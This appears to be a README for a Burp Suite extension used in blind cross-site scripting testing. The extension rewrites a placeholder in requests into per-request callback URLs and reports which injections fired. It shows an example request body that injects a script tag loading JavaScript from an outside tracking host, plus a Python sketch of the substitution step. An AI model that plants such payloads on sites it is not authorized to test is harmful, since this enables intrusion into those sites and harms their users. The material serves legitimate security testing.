yxw21/xssbughunter

What is this tool for?

This tool generates XSS payload addresses that can be used to track HTTP requests. With it, all your injection attempts are tracked, and the reports you generate include the full HTTP request in the final output.

Minimum Burp Suite Version

2023.1

This version is required because the extension uses the Burp Extensions API (Montoya).

Setup

You can download the jar directly and load it into Burp Suite.

After loading the plugin, a new tab will be created, as shown below.

image

Just fill in the form and click Login.

replace is the JavaScript address that needs to be replaced. (Choose a value for replace that is unlikely to appear in normal HTTP traffic, so that it stays unique.)

For example (replace is test123):

GET /concat-us HTTP/1.1
Host: example.com
aaa: test123

content=testhello<script src="test123"></script>

Finally, the extension will automatically update the request:

GET /concat-us HTTP/1.1
Host: example.com
aaa: https://request-id-domain.xss.cl

content=testhello<script src="https://request-id-domain.xss.cl"></script>
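
The substitution step described above, as an added sketch that is not taken from the extension's source. The callback domain `tracker.example`, the id format, and the function names are assumptions; the sample request is constructed from the README's example.

```python
import secrets

CALLBACK_DOMAIN = "tracker.example"  # assumption: stand-in for the tool's callback domain


def rewrite_request(raw: bytes, placeholder: bytes, store: dict) -> bytes:
    """Swap every `placeholder` in a raw HTTP request for a per-request URL.

    The untouched original is saved in `store` under the generated id, so a
    later callback to that host name can be matched to the request that sent it.
    """
    if placeholder not in raw:
        return raw  # nothing to track; leave normal traffic alone
    request_id = secrets.token_hex(8)  # assumption: the real id format is not documented
    url = f"https://{request_id}.{CALLBACK_DOMAIN}".encode()
    store[request_id] = raw

    head, sep, body = raw.partition(b"\r\n\r\n")
    head = head.replace(placeholder, url)
    body = body.replace(placeholder, url)

    # The URL is longer than the placeholder, so a stale Content-Length would
    # make the server truncate the body. Recompute it when the header is present.
    lines = head.split(b"\r\n")
    for i, line in enumerate(lines):
        if line.lower().startswith(b"content-length:"):
            lines[i] = b"Content-Length: " + str(len(body)).encode()
    return b"\r\n".join(lines) + sep + body


def lookup(host: str, store: dict):
    """Map the Host of an incoming callback back to the stored request."""
    request_id, _, domain = host.partition(".")
    return store.get(request_id) if domain == CALLBACK_DOMAIN else None


# Constructed sample request, modelled on the README's example (replace is test123)
SAMPLE = (
    b"POST /concat-us HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"aaa: test123\r\n"
    b"Content-Length: 48\r\n"
    b"\r\n"
    b'content=testhello<script src="test123"></script>'
)
```

A request that does not contain the placeholder is returned unchanged and gets no id, which is why a placeholder that collides with ordinary traffic would pollute the report.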

Where to view the request that triggered the payload

https://xss.bughunter.app/dashboard/trigger

image